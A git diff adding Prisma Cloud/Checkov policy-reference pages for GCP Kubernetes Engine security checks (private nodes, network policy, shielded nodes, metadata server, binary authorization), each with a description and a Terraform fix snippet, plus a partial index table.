diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-6.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-6.adoc new file mode 100644 index 000000000..d6143ed2e --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-6.adoc @@ -0,0 +1,62 @@ +== GCP Kubernetes Engine private cluster has private endpoint disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 1478c66d-2911-4a19-80fb-ddc36ab2a270 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEPrivateClusterConfig.py[CKV_GCP_25] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Private clusters enable isolation of nodes from any inbound and outbound connectivity to the public internet. +This is achieved as the nodes have internal RFC 1918 IP addresses only. +In private clusters, the cluster master has private and public endpoints. +You can configure which endpoint should be enabled or disabled to control access to the public internet. +We recommend you enable private cluster when creating Kubernetes clusters. +By creating a private cluster, the nodes will have a reserved set of IP addresses, ensuring their workloads are isolated from the public internet. + +=== Fix - Buildtime + + +*Terraform* + + +Add Block: *private_cluster_config* with attribute *enable_private_nodes* set to _true_. + + +[source,go] +---- +{ + "resource "google_container_cluster" "cluster" { +... ++ private_cluster_config { ++ enable_private_nodes=true ++ } +... +}", + + "name": "google_container_cluster.cluster.tf" +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-7.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-7.adoc new file mode 100644 index 000000000..9b4b6ce85 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-7.adoc @@ -0,0 +1,57 @@ +== GCP Kubernetes Engine Clusters have Network policy disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 6ddbfdfe-3936-43d0-8157-97a7899beae6 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKENetworkPolicyEnabled.py[CKV_GCP_12] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Defining a network policy helps ensure that a compromised front-end service in your application cannot communicate directly with an external interface, for example, a billing or an accounting service several levels down. +Network policy rules can ensure that Pods and Services in a given namespace cannot access other Pods or Services in a different namespace. +We recommend you enable Network Policy on kubernetes engine clusters to determine which Pods and Services can access one another inside your cluster. +This ensures only the required services are communicating and no explicitly indicated traffic is able to reach private clusters. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "google_container_cluster" "pass" { + name = "google_cluster" + network_policy { + enabled = true + } + +}", +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-8.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-8.adoc new file mode 100644 index 000000000..e6829da23 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-8.adoc @@ -0,0 +1,78 @@ +== GCP Kubernetes engine clusters have client certificate disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 4b071d02-1ade-4935-a166-fd5ba04ae198 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEClientCertificateDisabled.py[CKV_GCP_13] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Kubernetes uses client certificates, bearer tokens, an authenticating proxy, HTTP basic auth or OAuth app to authenticate API requests through authentication plugins. +As HTTP requests are made to the API server, plugins attempt to associate the following attributes with the request. +We recommend you ensure Kubernetes engine clusters are authenticated using OAuth method and not using client certificates as before after service latest upgrade. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "google_container_cluster" "primary" { + name = "marcellus-wallace" + location = "us-central1-a" + initial_node_count = 3 + master_auth { + client_certificate_config { + issue_client_certificate = false + } + + } + node_config { + # Google recommends custom service accounts that have cloud-platform scope and permissions granted via IAM Roles. + service_account = google_service_account.default.email + oauth_scopes = [ + "https://www.googleapis.com/auth/cloud-platform" + ] + labels = { + foo = "bar" + } + + tags = ["foo", "bar"] + } + + timeouts { + create = "30m" + update = "40m" + } + +} +", +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-9.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-9.adoc new file mode 100644 index 000000000..4048305a6 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-9.adoc @@ -0,0 +1,68 @@ +== GCP Kubernetes Engine Clusters have pod security policy disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b654ab07-f39a-4a35-9dac-2948a61e03c2 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEPodSecurityPolicyEnabled.py[CKV_GCP_24] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +*PodSecurityPolicy* is an admission controller resource created to validate requests to create and update Pods on your cluster. +The *PodSecurityPolicy* defines a set of conditions that Pods must meet to be accepted by the cluster. +When a request to create or update a Pod does not meet the conditions in the PodSecurityPolicy, that request is rejected and an error is returned. +We recommend you enable PodSecurityPolicy Controller on Kubernetes engine clusters. + +//// +=== Fix - Runtime + + +* Gcloud CLI To update the cluster to enable the PodSecurityPolicy Controller, use this command:* + + +---- +gcloud beta container clusters update cluster-name --enable-pod-security-policy +---- +More information at: https://cloud.google.com/kubernetes-engine/docs/how-to/pod-security-policies?hl=en [https://cloud.google.com/kubernetes-engine/docs/how-to/pod-security-policies] +//// + +=== Fix - Buildtime + + +*Terraform* + + +First, be sure to have the *google-beta* provider setup in the *google_container_cluster*, then add the following block of code: + + +[source,go] +---- +{ + "pod_security_policy_config { + enabled = true +}", + +} +---- + +More information at: https://www.terraform.io/docs/providers/google/r/container_cluster.html#pod_security_policy_config diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/enable-vpc-flow-logs-and-intranode-visibility.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/enable-vpc-flow-logs-and-intranode-visibility.adoc new file mode 100644 index 000000000..6a8bbea62 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/enable-vpc-flow-logs-and-intranode-visibility.adoc @@ -0,0 +1,56 @@ +== GCP Kubernetes cluster intra-node visibility disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| bee0893d-85fb-403f-9ba7-a5269a46d382 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEEnableVPCFlowLogs.py[CKV_GCP_61] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Enable VPC Flow Logs and Intranode Visibility to see pod-level traffic, even for traffic within a worker node. +With this feature, you can use VPC Flow Logs or other VPC features for intranode traffic. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_container_cluster +* *Arguments:* enable_intranode_visibility + + +[source,go] +---- +{ + "resource "google_container_cluster" "example" { + name = var.name + location = var.location + project = data.google_project.project.name ++ enable_intranode_visibility = true +", +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-clusters-are-created-with-private-nodes.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-clusters-are-created-with-private-nodes.adoc new file mode 100644 index 000000000..b41b75f4e --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-clusters-are-created-with-private-nodes.adoc @@ -0,0 +1,61 @@ +== GCP Kubernetes Engine Clusters not configured with private nodes feature + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| f5db1fcd-aa46-490e-9068-dd499ddb364b + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEPrivateNodes.py[CKV_GCP_64] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Disable public IP addresses for cluster nodes, so that they only have private IP addresses. +Private Nodes are nodes with no public IP addresses. +Disabling public IP addresses on cluster nodes restricts access to only internal networks, forcing attackers to obtain local network access before attempting to compromise the underlying Kubernetes hosts. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_container_cluster +* *Arguments:* private_cluster_config + + +[source,go] +---- +{ + "resource "google_container_cluster" "example" { + name = var.name + location = var.location + project = data.google_project.project.name + ++ private_cluster_config { ++ enable_private_nodes = var.private_cluster_config["enable_private_nodes"] ++ enable_private_endpoint = var.private_cluster_config["enable_private_endpoint"] ++ master_ipv4_cidr_block = var.private_cluster_config["master_ipv4_cidr_block"] ++ }", +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-gke-clusters-are-not-running-using-the-compute-engine-default-service-account.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-gke-clusters-are-not-running-using-the-compute-engine-default-service-account.adoc new file mode 100644 index 000000000..14fda25cf --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-gke-clusters-are-not-running-using-the-compute-engine-default-service-account.adoc @@ -0,0 +1,89 @@ +== GCP Kubernetes Engine Cluster Nodes have default Service account for Project access + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| d4a28b1f-9a9b-4a40-874d-9da7f9d4e8a6 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GKEClustersAreNotUsingDefaultServiceAccount.yaml[CKV2_GCP_1] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Create and use minimally privileged Service accounts to run GKE cluster nodes instead of using the Compute Engine default Service account. +Unnecessary permissions could be abused in the case of a node compromise. +A GCP service account (as distinct from a Kubernetes ServiceAccount) is an identity that an instance or an application can use to run GCP API requests on your behalf. +This identity is used to identify virtual machine instances to other Google Cloud Platform services. +By default, Kubernetes Engine nodes use the Compute Engine default service account. +This account has broad access by default, as defined by access scopes, making it useful to a wide variety of applications on the VM, but it has more permissions than are required to run your Kubernetes Engine cluster. +You should create and use a minimally privileged service account to run your Kubernetes Engine cluster instead of using the Compute Engine default service account, and create separate service accounts for each Kubernetes Workload (See Recommendation 6.2.2). +Kubernetes Engine requires, at a minimum, the node service account to have the monitoring.viewer, monitoring.metricWriter, and logging.logWriter roles. +Additional roles may need to be added for the nodes to pull images from GCR. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_container_node_pool / google_container_cluster +* *Arguments:* google_project_default_service_accounts + + +[source,go] +---- +{ + "resource "google_project_default_service_accounts" "not_ok" { + project = "my-project-id" + action = "DELETE" + id="1234" +} + + +resource "google_container_node_pool" "primary_A_not_ok" { + name = "my-node-pool" + ... + + - service_account = google_project_default_service_accounts.not_ok.id + oauth_scopes = [ + "https://www.googleapis.com/auth/cloud-platform" + ] + } + +} + +resource "google_container_cluster" "primary_B_not_ok" { + + ... + node_config { +- service_account = google_project_default_service_accounts.not_ok.id + oauth_scopes = [ + "https://www.googleapis.com/auth/cloud-platform" + ] + } + +} + +", +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-integrity-monitoring-for-shielded-gke-nodes-is-enabled.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-integrity-monitoring-for-shielded-gke-nodes-is-enabled.adoc new file mode 100644 index 000000000..888f68b0a --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-integrity-monitoring-for-shielded-gke-nodes-is-enabled.adoc @@ -0,0 +1,63 @@ +== GCP Kubernetes cluster shielded GKE node with integrity monitoring disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| d64da692-874d-48fd-9acf-391473ae94c9 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEEnsureIntegrityMonitoring.py[CKV_GCP_72] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Enable Integrity Monitoring for Shielded GKE Nodes to be notified of inconsistencies during the node boot sequence. +Integrity Monitoring provides active alerting for Shielded GKE nodes which allows administrators to respond to integrity failures and prevent compromised nodes from being deployed into the cluster. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_container_cluster / google_container_node_pool +* *Arguments:* node_config.shielded_instance_config.enable_integrity_monitoring + + +[source,go] +---- +{ + "resource "google_container_cluster" "fail" { + name = var.name + location = var.location + initial_node_count = 1 + project = data.google_project.project.name + + node_config { + + shielded_instance_config { +- enable_integrity_monitoring = false + } + + }", +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-legacy-compute-engine-instance-metadata-apis-are-disabled.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-legacy-compute-engine-instance-metadata-apis-are-disabled.adoc new file mode 100644 index 000000000..922849fed --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-legacy-compute-engine-instance-metadata-apis-are-disabled.adoc @@ -0,0 +1,63 @@ +== GCP Kubernetes Engine Clusters have legacy compute engine metadata endpoints enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 3c2b1b56-a6d4-41c1-b306-4edc2c840c19 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKELegacyInstanceMetadataDisabled.py[CKV_GCP_67] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Disable the legacy GCE instance metadata APIs for GKE nodes. +Under some circumstances, these can be used from within a pod to extract the node's credentials. +The legacy GCE metadata endpoint allows simple HTTP requests to be made returning sensitive information. +To prevent the enumeration of metadata endpoints and data exfiltration, the legacy metadata endpoint must be disabled. +Without requiring a custom HTTP header when accessing the legacy GCE metadata endpoint, a flaw in an application that allows an attacker to trick the code into retrieving the contents of an attacker-specified web URL could provide a simple method for enumeration and potential credential exfiltration. +By requiring a custom HTTP header, the attacker needs to exploit an application flaw that allows them to control the URL and also add custom headers in order to carry out this attack successfully. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_container_cluster +* *Arguments:* min_master_version + + +[source,go] +---- +{ + "resource "google_container_cluster" "example" { + name = var.name + location = var.location + initial_node_count = 1 + project = data.google_project.project.name + ++ min_master_version = 1.12 // (or higher) +}", + +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-secure-boot-for-shielded-gke-nodes-is-enabled.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-secure-boot-for-shielded-gke-nodes-is-enabled.adoc new file mode 100644 index 000000000..f4e385440 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-secure-boot-for-shielded-gke-nodes-is-enabled.adoc @@ -0,0 +1,66 @@ +== GCP Kubernetes cluster shielded GKE node with Secure Boot disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 9a2b73c4-dfb2-4926-9198-c8524894ab7e + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKESecureBootforShieldedNodes.py[CKV_GCP_68] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Enable Secure Boot for Shielded GKE Nodes to verify the digital signature of node boot components. +An attacker may seek to alter boot components to persist malware or root kits during system initialization. +Secure Boot helps ensure that the system only runs authentic software by verifying the digital signature of all boot components, and halting the boot process if signature verification fails. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_container_cluster / google_container_node_pool +* *Arguments:* node_config.shielded_instance_config.enable_secure_boot + + +[source,go] +---- +{ + " +resource "google_container_cluster" "success" { + name = var.name + + ... + node_config { + workload_metadata_config { + node_metadata = "GKE_METADATA_SERVER" + } + + shielded_instance_config { +- enable_secure_boot = false + } + + }", +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-shielded-gke-nodes-are-enabled.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-shielded-gke-nodes-are-enabled.adoc new file mode 100644 index 000000000..afd4f55a7 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-shielded-gke-nodes-are-enabled.adoc @@ -0,0 +1,64 @@ +== GCP Kubernetes cluster Shielded GKE Nodes feature disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 7b14d2f7-0632-4adf-97c9-8c88b1d7f084 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEEnableShieldedNodes.py[CKV_GCP_71] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Shielded GKE Nodes provides verifiable integrity via secure boot, virtual trusted platform module (vTPM)-enabled measured boot, and integrity monitoring. +Shielded GKE nodes protects clusters against boot- or kernel-level malware or rootkits which persist beyond infected OS. +Shielded GKE nodes run firmware which is signed and verified using Google's Certificate Authority, ensuring that the nodes' firmware is unmodified and establishing the root of trust for Secure Boot. +GKE node identity is strongly protected via virtual Trusted Platform Module (vTPM) and verified remotely by the master node before the node joins the cluster. +Lastly, GKE node integrity (i.e., boot sequence and kernel) is measured and can be monitored and verified remotely. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_container_cluster +* *Arguments:* enable_shielded_nodes + + +[source,go] +---- +{ + "resource "google_container_cluster" "success" { + name = var.name + location = var.location + initial_node_count = 1 + project = data.google_project.project.name + ++ enable_shielded_nodes = true +} + + +", +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-the-gke-metadata-server-is-enabled.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-the-gke-metadata-server-is-enabled.adoc new file mode 100644 index 000000000..d6e3e67a4 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-the-gke-metadata-server-is-enabled.adoc @@ -0,0 +1,67 @@ +== The GKE metadata server is disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 2e464a60-e3ea-4e23-95a2-f7c5f7e624ec + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEMetadataServerIsEnabled.py[CKV_GCP_69] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Running the GKE Metadata Server prevents workloads from accessing sensitive instance metadata and facilitates Workload Identity. +Every node stores its metadata on a metadata server. +Some of this metadata, such as kubelet credentials and the VM instance identity token, is sensitive and should not be exposed to a Kubernetes workload. +Enabling the GKE Metadata server prevents pods (that are not running on the host network) from accessing this metadata and facilitates Workload Identity. +When unspecified, the default setting allows running pods to have full access to the node's underlying metadata server. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_container_cluster / google_container_node_pool +* *Arguments:* node_config.workload_metadata_config.node_metadata + + +[source,go] +---- +{ + "resource "google_container_cluster" "example" { + name = var.name + location = var.location + initial_node_count = 1 + project = data.google_project.project.name + ++ node_config { ++ workload_metadata_config { ++ node_metadata = "GKE_METADATA_SERVER" ++ } ++ } + +} + +", +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-the-gke-release-channel-is-set.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-the-gke-release-channel-is-set.adoc new file mode 100644 index 000000000..40691c246 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-the-gke-release-channel-is-set.adoc @@ -0,0 +1,79 @@ +== GCP Kubernetes Engine cluster not using Release Channel for version management + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 6b65e730-d5bf-400c-9a08-9721d6ccdf4a + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEReleaseChannel.py[CKV_GCP_70] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +The release channels allow organizations to better set their expectation of what is stable. +GKE's release channel options include "`rapid,`" "`regular,`" and "`stable.`" This allows you to opt for the alpha releases as part of the "`rapid`" option, "`regular`" for standard release needs and "`stable`" when the tried-and-tested version becomes available. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "google_container_cluster" "success" { + name = var.name + location = var.location + initial_node_count = 1 + project = data.google_project.project.name + + network = var.network + subnetwork = var.subnetwork + + ip_allocation_policy { + cluster_ipv4_cidr_block = var.ip_allocation_policy["cluster_ipv4_cidr_block"] + cluster_secondary_range_name = var.ip_allocation_policy["cluster_secondary_range_name"] + services_ipv4_cidr_block = var.ip_allocation_policy["services_ipv4_cidr_block"] + services_secondary_range_name = var.ip_allocation_policy["services_secondary_range_name"] + } + + + node_config { + workload_metadata_config { + node_metadata = "GKE_METADATA_SERVER" + } + + } + + release_channel { + channel = var.release_channel + } + + +}", + +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-use-of-binary-authorization.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-use-of-binary-authorization.adoc new file mode 100644 index 000000000..d825ac3e0 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-use-of-binary-authorization.adoc @@ -0,0 +1,60 @@ +== GCP Kubernetes Engine Clusters have binary authorization disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 50d5ec3b-1710-4ff7-bb09-061c30deef96 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEBinaryAuthorization.py[CKV_GCP_66] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Binary Authorization helps to protect supply-chain security by only allowing images with verifiable cryptographically signed metadata into the cluster. +Binary Authorization provides software supply-chain security for images that you deploy to GKE from Google Container Registry (GCR) or another container image registry. +Binary Authorization requires images to be signed by trusted authorities during the development process. +These signatures are then validated at deployment time. +By enforcing validation, you can gain tighter control over your container environment by ensuring only verified images are integrated into the build-and-release process. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_container_cluster +* *Arguments:* enable_binary_authorization + + +[source,go] +---- +{ + "resource "google_container_cluster" "success" { + name = var.name + location = var.location + initial_node_count = 1 + project = data.google_project.project.name ++ enable_binary_authorization = true +", +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/google-cloud-kubernetes-policies.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/google-cloud-kubernetes-policies.adoc new file mode 100644 index 000000000..111cdb44f --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/google-cloud-kubernetes-policies.adoc @@ -0,0 +1,139 @@ +== Google Cloud Kubernetes Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:bc-gcp-kubernetes-1.adoc[GCP Kubernetes Engine Clusters have Stackdriver Logging disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEClusterLogging.py[CKV_GCP_1] +|MEDIUM + + +|xref:bc-gcp-kubernetes-10.adoc[GKE control plane is public] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEPublicControlPlane.py[CKV_GCP_18] +|LOW + + +|xref:bc-gcp-kubernetes-11.adoc[GCP Kubernetes Engine Clusters Basic Authentication is set to Enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEBasicAuth.py[CKV_GCP_19] +|MEDIUM + + +|xref:bc-gcp-kubernetes-12.adoc[GCP Kubernetes Engine Clusters have Master authorized networks disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEMasterAuthorizedNetworksEnabled.py[CKV_GCP_20] +|MEDIUM + + +|xref:bc-gcp-kubernetes-13.adoc[GCP Kubernetes Engine Clusters without any label information] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEHasLabels.py[CKV_GCP_21] +|LOW + + +|xref:bc-gcp-kubernetes-14.adoc[GCP Kubernetes Engine Clusters not using Container-Optimized OS for Node image] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEUseCosImage.py[CKV_GCP_22] +|LOW + + +|xref:bc-gcp-kubernetes-15.adoc[GCP Kubernetes Engine Clusters have Alias IP disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEAliasIpEnabled.py[CKV_GCP_23] +|LOW + + +|xref:bc-gcp-kubernetes-2.adoc[GCP Kubernetes Engine Clusters have Legacy Authorization enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEDisableLegacyAuth.py[CKV_GCP_7] +|MEDIUM + + +|xref:bc-gcp-kubernetes-3.adoc[GCP Kubernetes Engine Clusters have Cloud Monitoring disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEMonitoringEnabled.py[CKV_GCP_8] +|MEDIUM + + +|xref:bc-gcp-kubernetes-4.adoc[GCP Kubernetes cluster node auto-repair configuration disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKENodePoolAutoRepairEnabled.py[CKV_GCP_9] +|MEDIUM + + +|xref:bc-gcp-kubernetes-5.adoc[GCP Kubernetes cluster node auto-upgrade configuration disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKENodePoolAutoUpgradeEnabled.py[CKV_GCP_10] +|MEDIUM + + +|xref:bc-gcp-kubernetes-6.adoc[GCP Kubernetes Engine private cluster has private endpoint disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEPrivateClusterConfig.py[CKV_GCP_25] +|MEDIUM + + +|xref:bc-gcp-kubernetes-7.adoc[GCP Kubernetes Engine Clusters have Network policy disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKENetworkPolicyEnabled.py[CKV_GCP_12] +|MEDIUM + + +|xref:bc-gcp-kubernetes-8.adoc[GCP Kubernetes engine clusters have client certificate disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEClientCertificateDisabled.py[CKV_GCP_13] +|LOW + + +|xref:bc-gcp-kubernetes-9.adoc[GCP Kubernetes Engine Clusters have pod security policy disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEPodSecurityPolicyEnabled.py[CKV_GCP_24] +|LOW + + +|xref:enable-vpc-flow-logs-and-intranode-visibility.adoc[GCP Kubernetes cluster intra-node visibility disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEEnableVPCFlowLogs.py[CKV_GCP_61] +|MEDIUM + + +|xref:ensure-clusters-are-created-with-private-nodes.adoc[GCP Kubernetes Engine Clusters not configured with private nodes feature] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEPrivateNodes.py[CKV_GCP_64] +|MEDIUM + + +|xref:ensure-gke-clusters-are-not-running-using-the-compute-engine-default-service-account.adoc[GCP Kubernetes Engine Cluster Nodes have default Service account for Project access] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GKEClustersAreNotUsingDefaultServiceAccount.yaml[CKV2_GCP_1] +|MEDIUM + + +|xref:ensure-integrity-monitoring-for-shielded-gke-nodes-is-enabled.adoc[GCP Kubernetes cluster shielded GKE node with integrity monitoring disabled] +| 